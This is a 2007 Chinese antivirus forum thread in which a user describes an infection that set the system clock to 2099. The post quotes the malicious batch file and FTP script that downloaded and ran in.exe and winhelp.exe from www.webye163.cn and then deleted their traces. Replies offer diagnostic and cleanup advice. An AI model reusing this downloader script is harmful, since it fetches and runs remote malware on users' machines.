瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 系统时间被改为2099年,上网速度慢,瑞星无法杀掉,郁闷!!

1   1  /  1  页   跳转

系统时间被改为2099年,上网速度慢,瑞星无法杀掉,郁闷!!

系统时间被改为2099年,上网速度慢,瑞星无法杀掉,郁闷!!

已经好几天了,瑞星怎么反应这么慢呢

前几天在上网时,有程序请求访问网络,路径C:\WINNT\SYSTEM32\ftp.exe ,拒绝后又出现C:\WINNT\SYSTEM32\sft.exe请求访问网络,紧接着Windows文件保护出现了。我此时没有打开任何程序,估计中毒了。打开C:\WINNT ,发现一个批处理文件begin.bat,出于好奇,用记事本打开后发现以下内容:
set a=星期四 2099-01-01
date=2099-01-01
if exist C:\WINNT\system32\dllcache\ftp.exe ren C:\WINNT\system32\dllcache\ftp.exe sft.exe
if exist C:\WINNT\system32\ftp.exe ren C:\WINNT\system32\ftp.exe sft.exe
sft.exe -s:C:\WINNT\help.dll
if not exist in.exe ftp -s:C:\WINNT\help.dll
in.exe
in.exe
date=%a%
:end
del C:\WINNT\help.dll
del C:\WINNT\BEGIN.BAT
exit
我这时才注意到系统的时间已经被改到2099年去了,急忙打开任务管理器,发现了几个可疑进程cmd.exe ,我没有急着结束进程,用金山反间谍查看路径后发现,cmd.exe确实是系统自带的命令与提示符,但是有一个确指向http://www.webye163.cn/的命令,我分析这是一个恶意网站,经验证果然如此。
批处理中还有一个help.dll,有记事本打开后,发现如下内容:
OPEN www.webye163.cn
loved
get crr.ini in.exe
get crt.ini winhelp.exe
Bye


[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler )
最后编辑2007-11-14 10:09:37
分享到:
gototop
 

http://download.rising.com.cn/for_down/kakatool/kakasetupv4.exe下载卡卡上网安全助手4.0
1 运行瑞星卡卡上网安全助手
2 诊断求助=》电脑诊断日志
3 选择"文件详细信息"、"文件名相似分析"2个选项
4 开始扫描=》导出信息,导成txt格式(也可以是htm格式方便自己看,不过论坛不能上传htm格式)
5 把日志中的报告完整拷贝贴上来(附件形式发上来也可以),不要修改(一次发不完请分次发上来)
6 扫日志的时候尽量把不必要的软件关闭 如QQ TM 迅雷等
7 把扫描出来的可疑文件上传给瑞星http://up.rising.com.cn/webmail/uploadnew.htm
gototop
 

你没定时更新吧,如果经常更新查毒能力会好一点的.
gototop
 

晕到,和我上次中的病毒怎么症状那么接近,查点搞死我啊
gototop
 

没遇过这个毛病,建议楼主不要乱点网叶!
gototop
 

是中了某种病毒了吧,楼主把原来的删了,下载个08版的杀杀就没问题了。
gototop
 

没有用的,是2099病毒瑞星查不出来,现在好像没有专杀工具,格式化也不行。
gototop
 

扫描一份日志上来看看
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT